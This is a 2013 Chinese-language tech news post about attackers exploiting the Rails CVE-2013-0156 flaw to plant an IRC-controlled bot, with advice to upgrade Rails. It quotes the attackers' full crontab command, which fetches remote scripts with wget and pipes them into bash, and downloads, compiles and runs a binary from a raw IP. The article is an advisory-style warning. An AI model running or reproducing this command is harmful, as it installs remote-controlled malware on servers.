阅读更多

1顶
0踩

编程语言

原创新闻 Rails 老漏洞仍在肆虐,请尽快升级

2013-05-30 12:46 by 副主编 wangguo 评论(4) 有10397人浏览
安全专家Jarmoc在博客中称,过去几天,一些基于Rails的Web应用程序和服务器遭到了攻击,攻击者成功入侵后,会在服务器上安装一个机器人,以接受来自IRC频道的进一步指示。

攻击者利用的是CVE-2013-0156这个安全漏洞,尽管Rails团队已经在今年1月份修复了该漏洞,但目前还有大量的服务器未更新至最新的版本,使得攻击者有机可乘。

该漏洞存在于Action Pack模块的参数解析代码中,允许攻击者绕过认证系统,注入并执行任意SQL代码,或对Rails应用执行DoS攻击。新的Rails版本中已经修复了该漏洞。

攻击者试图在crontab中添加如下命令(现在该命令已不可用):

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k


该命令执行后会下载名为cmd1、cmd2和cmd3的可执行文件,并下载一个名为k.c的C源码文件到/tmp目录中,使用系统的GCC编译执行。或许是为了防止编译失败,该条命令还将下载一个预编译的k版本。

Jarmoc在博客中公布了k.c的源码,感兴趣的开发者可点击这里

目前最新的Rails版本为3.2.13、3.1.12和2.3.18,建议开发者尽快升级。

Via jarmoc
1
0
评论 共 4 条 请登录后发表评论
4 楼 wujingtianze 2013-06-05 09:43
redis?
3 楼 it90ceo 2013-06-02 09:36
支持下。。。
2 楼 lection.yu 2013-05-31 10:53
黑客高人真多。。
1 楼 7y4z2008 2013-05-31 08:43
地下0day市场更多

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

  • java数据透视表_使用java如何操作excel数据透视表

    支持楼上,jxl可以。... int getNumberOfSheets()获得工作薄(Workbook)中工作表(Sheet)的个数,示例:jxl.Workbook rwb = jxl.Workbook.getWorkbook(new File(sourcefile));int sheets = rwb.getNumberOfSheets...

  • java数据透视表_Java 创建 Excel 数据透视表

    Excel 数据透视表具有强大的...本文将介绍如何在Java应用程序中创建Excel数据透视表及设置透视表的格式。Jar文件导入方法方法一:下载最新的 Free Spire. XLS for Java 包并解压缩 , 然后从lib文件夹下, 将 Spir...

  • java excel 透视_在Java中用Excel创建数据透视表和数据透视图

    当您需要快速分析Excel工作表中的数据并查看数据中的比较,...在本文中,我将介绍如何使用Free Spire.XLS for Java API在Java中的Excel文件中创建数据透视表和数据透视图。添加依赖项首先,您需要添加所需的依赖项,...

  • java 数据透视表 组件_Java创建Excel数据透视表

    正版现货excel效率手册早做完不锡22.82元包邮(需用券)去购买 >Excel 数据透视表具有强大的数据...本文将介绍如何在Java应用程序中创建Excel数据透视表及设置透视表的格式。使用工具: Free Spire. XLS for Java (...

  • java excel 透视_Java Excel透视表相关操作实现代码

    概述透视表是依据已有数据源来创建的交互式表格,我们可在excel中创建透视表,也可编辑已有透视表。所需工具:Free Spire.XLS for Java免费版,编辑代码前,先下载导入jar到Java程序(可手动下载导入,或通过Maven...

  • 如何使用Java以编程方式在Excel中创建数据透视表?

    Excel电子表格中的数据透视表用于以交互方式汇总数据。假设在工作表中有许多发票...为了使用Excel数据透视表,我们将使用Aspose.Cells for Java,它是一个功能强大的API,可让您从Java应用程序内部生成,修改和转换Exc

  • java数据透视表算法_用Java Steams创建数据透视表

    【51CTO.com快译】这次让我们来看看如何使用Java 8 Streams(流)来实现一张数据透视表。通常情况下,原始数据本身一般并不容易被人们所读懂,因此我们需要进行一些数据聚合操作来辨别出原始数据中的各种规律模式。而...

  • java excel 透视_java基于poi导出excel透视表代码实例

    这篇文章主要介绍了java基于poi导出excel透视表代码实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下从前,我是一个前端程序猿,怀着对打通任(前)督(后)二...

  • java excel 透视_JAVA操作Excel创建透视表

    Free Spire.XLS for Java,作者使用的是免费版。可去官网下载Jar包后解压,将解压后lib文件夹下的Spire.Xls.jar手动导入到Java程序;或者通过Maven仓库下载导入。JAVA程序代码如下importcom.sp...

  • java poi 数据透视,Apache的POI:Excel数据透视表 - 行标签

    I have a requirement to create a excel sheet in JAVA as below :I am not able to create a row label with multiple columns side by side ( menus and submenus filter ).Instead of displaying the submenu in...

  • 手把手教你如何在Java在Excel中进行数据分析

    前一段时间淘宝出了一个“淘宝人生”的模块,可以看从注册淘宝账号至今的消费记录,仔细想了想,现在微信、淘宝这些APP好像都喜欢出这种记录使用者的支付、消费情况的功能。

  • excel 宏 数据透视表_宏从多个文件创建Excel数据透视表

    excel 宏 数据透视表 宏从多个文件创建Excel数据透视表 (Macro Creates Excel Pivot Table From Multiple Files) If you want to create a pivot table from data on different worksheets, you can use a Multiple ...

  • excel数据透视表_Excel数据透视表排序问题

    excel数据透视表 Excel数据透视表排序问题 (Excel Pivot Table Sorting Problems) Usually, it's easy to sort an Excel pivot table – just click the drop down arrow in a pivot table heading, and select one ...

  • excel数据透视表_Excel数据透视表选择快速提示

    excel数据透视表 Excel数据透视表选择快速提示 (Excel Pivot Table Selection Quick Tip)To format a pivot table, you can select a specific section, such as one of the fields, or a grand total. When you ...

  • java excel 透视,Java开源库生成数据透视表excel

    Given an excel file I want to generate a pivot table programmatically. I have heard of Aspose.Cells but it is paid version. Can someone suggest some open source libraries similar to Aspose.Cells or at...

  • java刷新透视表数据源,Java 创建、刷新Excel透视表/设置透视表行折叠、展开

    Java 创建、刷新Excel透视表/设置透视表行折叠、展开透视表是依据已有数据源来创建的交互式表格,我们可在excel中创建透视表,也可编辑已有透视表。本文以创建透视表、刷新透视表以及设置透视表的行展开或折叠为例,...

  • 全国计算机等级考试二级openGauss数据库程序设计样题解析

    主要内容涵盖单选题和操作题两大部分。单选题涉及openGauss数据库的基本概念、数据模型、SQL语法、事务管理和用户权限等方面的知识点。操作题则围绕一个名为bookdb的图书购买信息数据库展开,具体任务包括插入图书信息、更新顾客信息、删除购买记录、查询特定图书信息以及创建视图、存储过程和触发器等实际操作。每道题目均附带详细的解题步骤和最终答案。

  • 新建 Microsoft Word 文档 (9).docx

    新建 Microsoft Word 文档 (9).docx

  • Delphi 12.3控件之nrCommLib Pro v9.54 Full Source for D10.3-D12.7z

    Delphi 12.3控件之nrCommLib Pro v9.54 Full Source for D10.3-D12.7z

  • 三菱PLC FX5U控制四轴伺服系统:硬件配置、参数设置及运动控制详解

    内容概要:本文详细介绍了使用三菱PLC FX5U控制四轴伺服系统的全过程,涵盖硬件配置、电气接线、参数设置以及运动控制逻辑。硬件方面,选用三菱FX5U-64MT作为主控制器,搭配四个MR-JE-20A伺服驱动器和其他必要组件。软件部分则深入探讨了轴参数初始化、原点回归、多轴联动、HMI界面设计及报警处理等关键技术环节。特别针对旋转轴的特殊处理进行了详细说明,如双速原点回归、绝对定位指令的应用等。此外,还提供了调试经验和优化技巧,确保系统的高精度和平稳运行。 适合人群:从事自动化控制系统设计、调试的技术人员,尤其是对三菱PLC和伺服系统有一定了解的研发人员。 使用场景及目标:适用于工业自动化领域的四轴伺服控制系统开发,旨在帮助工程师掌握从硬件选型到软件编程的一整套解决方案,提高项目的成功率和技术水平。 其他说明:文中附有多份参考资料,包括完整的程序文件、界面工程、CAD接线图和伺服参数清单,便于读者进行实际操作和验证。

Global site tag (gtag.js) - Google Analytics